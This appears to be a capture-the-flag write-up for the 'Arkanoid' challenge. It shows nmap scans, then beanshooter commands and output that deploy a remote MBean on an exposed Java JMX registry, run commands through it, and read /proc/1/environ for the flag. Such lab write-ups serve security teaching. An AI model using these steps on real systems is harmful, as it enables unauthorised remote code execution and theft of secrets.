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Arkanoid (5 points)

Ahoy, officer,

a new server with a video game is to be placed in the ship's relaxation center . Your task is to check whether the server does not contain any vulnerabilities.

May you have fair winds and following seas!

The game server has domain name arkanoid.cns-jv.tcc.



Let's start with checking what listens on the server.

$ nmap arkanoid.cns-jv.tcc -p-
8000/tcp  open  http-alt
43547/tcp open  unknown
60001/tcp open  unknown
60002/tcp open  unknown

That's helpful, but perhaps it would be better to try to detect what types of services actually listen on those ports.

$ nmap -sV arkanoid.cns-jv.tcc -p 8000,43547,60001,60002
Starting Nmap 7.94 ( ) at 2023-10-03 22:20 CEST
Nmap scan report for arkanoid.cns-jv.tcc (
Host is up (0.0080s latency).

8000/tcp  open  http       JBoss Enterprise Application Platform
43547/tcp open  tcpwrapped
60001/tcp open  java-rmi   Java RMI
60002/tcp open  java-rmi   Java RMI

If we scan even deeper, we find JMX RMI registry running on port 60001.

$ nmap -sV -A arkanoid.cns-jv.tcc -p 60001
Starting Nmap 7.94 ( ) at 2023-10-03 22:36 CEST
Nmap scan report for arkanoid.cns-jv.tcc (
Host is up (0.0081s latency).

60001/tcp open  java-rmi Java RMI
| rmi-dumpregistry:
|   jmxrmi
|      implements,
|     extends
|       java.lang.reflect.Proxy
|       fields
|           Ljava/lang/reflect/InvocationHandler; h
|             java.rmi.server.RemoteObjectInvocationHandler
|             @localhost:60002
|             extends
|_              java.rmi.server.RemoteObject

The search for some tools to attack JMX reveals beanshooter. After cloning and a maven build (described in the "Installation" section of its README file) it's ready to use.

$ java -jar target/beanshooter-4.1.0-jar-with-dependencies.jar enum arkanoid.cns-jv.tcc 60001

beanshooter showing unauthorized access

The tool reports the possibility of unauthorized access, so let's try deploying some MBean (tonka to be precise).

Note: in the command below was the address of my PC. You need to use yours when running it, so that the bean is downloaded from the correct place.

$ java -jar target/beanshooter-4.1.0-jar-with-dependencies.jar tonka deploy arkanoid.cns-jv.tcc 60001 --stager-url

beanshooter deploying tonka bean

The deployment has been successful which grants us access to the server. Now we can either run interactive shell and explore (beanshooter tonka shell) or (if we already know what we're after) we can just run beanshooter tonka exec to execute a particular command.

In our case, the FLAG can be found in the environment of the process with PID = 1.

$ java -jar target/beanshooter-4.1.0-jar-with-dependencies.jar tonka exec arkanoid.cns-jv.tcc 60001 "cat /proc/1/environ"
[+] Invoking the executeCommand method with arguments: [cat, /proc/1/environ]
[+] The call was successful
[+] Server response:

Finally, let's just clean up after ourselves, so that we don't spoil it for other players. :angel:

$ java -jar target/beanshooter-4.1.0-jar-with-dependencies.jar tonka undeploy arkanoid.cns-jv.tcc 60001
[+] Removing MBean with ObjectName MLetTonkaBean:name=TonkaBean,id=1 from the MBeanServer.
[+] MBean was successfully removed.